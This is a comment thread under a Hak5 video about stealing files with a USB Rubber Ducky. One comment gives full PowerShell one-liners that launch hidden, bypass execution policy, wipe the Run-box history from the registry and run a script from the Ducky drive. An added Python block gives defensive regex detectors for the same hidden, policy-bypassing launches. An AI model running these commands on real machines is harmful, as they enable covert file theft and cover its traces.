43 thoughts on “Stealing Files with the USB Rubber Ducky – Hak5 2112”

  1. Thanks for the awesome video guys, will await your second part where you explain what is in the cmd file and then will have to break out my Ducky and give it a try :)

  2. Why do people keep saying # is the Pound symbol? It's the hash symbol. Nobody in the UK uses #! It's £. x_x Never mind, apparently it's another word for hash, which sounds silly to me… x_x Just call it a hash to save confusion. :P

  3. Anyone who uses run will notice when it's empty.
    Maybe find a way to copy it and replace it?

    Don't know if this will be possible within 160 lines, but you could also move this to the b.cmd, have it both start the shell, AND restore the run line history.

  4. I believe I am missing something fundamental.
    We are going through all this trouble to make an interface-less "backup" of data, so we are assuming the actor is plugging the ducky in when the victim is there? And the victim didn't notice the actor plugging it in?
    It is much more likely to not have the victim around, so not having an interface is a drawback, as the actor won't know the earliest he can remove the ducky.
    I couldn't find any specs on the ducky's write speeds, so with no interface, and not knowing how much data there is to "backup", how does the actor know how long to leave it plugged in?
    I think for once movies have it right with the hackers/spies popping it in and seeing a progress bar so they know at the earliest when they can remove it.

  5. Using SET will create an environment variable, but to access it using Powershell you need to use $Env:DK instead of %DK%. Since you're concerned with shortness, you can replace "Start-Process" with "start". It's exactly the same thing :)

  6. I'm surprised they even read the contents of your run box. They aren't usually that savvy. I've seen them look RIGHT AT jigsaw and completely ignore it while they hur dur syskey

    Also, 209 characters:

    powershell -NoP -NonI -W Hidden -Exec Bypass "rp -path 'HKCU:SoftwareMicrosoftWindowsCurrentVersionExplorerRunEMU' -Name'*'-EA 0;$P=gwmi Win32_Volume|?{$_.Label -eq 'K'}|select name; cd $P.name;.d.cmd"

    If you offload the RunEMU cleanup to the batch file (which you are going to be running anyway), you can get it down to 119:

    powershell -NoP -NonI -W Hidden -Exec Bypass "$P=gwmi Win32_Volume|?{$_.Label -eq 'K'}|select name; cd $P.name;.d.cmd"
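
Seen from the detection side, the abbreviated switches in comment 6 are why matching only on `-WindowStyle` or `-ExecutionPolicy` misses this launch: powershell.exe accepts shortened switch names. The following is an added example, not part of the comment thread or the Hak5 payload; the sample command lines are constructed, the function names are hypothetical, and the minimum prefix lengths are assumptions chosen to cover the forms in the comment.

```python
import re

def switch(name, min_len, value=None):
    """Regex for a powershell.exe switch written as any prefix of `name` that is
    at least `min_len` characters long, optionally followed by `value`."""
    head, tail = name[:min_len], name[min_len:]
    prefix = head + "".join(f"(?:{c}" for c in tail) + ")?" * len(tail)
    after = rf"\s+['\"]?{value}\b" if value else r"(?=\s|$)"
    return re.compile(rf"(?<!\S)[-/]{prefix}{after}", re.I)

INDICATORS = {
    "hidden_window": [switch("windowstyle", 1, "hidden")],
    "policy_bypass": [switch("executionpolicy", 2, "bypass"),
                      switch("ep", 2, "bypass")],
    "no_profile": [switch("noprofile", 3)],
    "non_interactive": [switch("noninteractive", 4)],
    # Drive located by volume label rather than by drive letter, as in comment 6.
    "volume_label_lookup": [re.compile(r"win32_volume.*\blabel\b", re.I)],
}

def indicators(cmdline):
    """Return the sorted names of the indicators present in one command line."""
    return sorted(name for name, pats in INDICATORS.items()
                  if any(p.search(cmdline) for p in pats))

def is_suspicious(cmdline):
    """Hidden window plus policy bypass, or either one with a label lookup."""
    hits = set(indicators(cmdline))
    core = {"hidden_window", "policy_bypass"}
    return core <= hits or ("volume_label_lookup" in hits and bool(core & hits))

# Constructed process-creation command lines (for example from Windows event
# 4688 or Sysmon event 1); the script that gets run is a placeholder.
SAMPLES = [
    "powershell -NoP -NonI -W Hidden -Exec Bypass \"$P=gwmi Win32_Volume|"
    "?{$_.Label -eq 'K'}|select name; <run script from $P>\"",
    "powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -File <path>",
    "powershell.exe -NoProfile -File C:\\Scripts\\inventory.ps1",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(is_suspicious(line), indicators(line))
```
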

  7. Great vid as usual, please get rid of Patrick Norton, he is so computer illiterate, I know 12 year olds that know much more than him, he was relevant in the late 90's and 2000's, now he is just annoying and imho brings the channel down.

  8. Does the Rubber Ducky take care of the different keyboard layouts and only print what the programmer intends as an output?
    An Arduino, for example, can only operate properly on an en-US keyboard layout without changing the layout beforehand (slashes and other special characters have to be called differently than expected) or fiddling with the Keyboard library itself.
    Example: @ would have to be called with " when the default layout is en-GB, since Shift+2 on a GB keyboard outputs " but @ on a US keyboard.
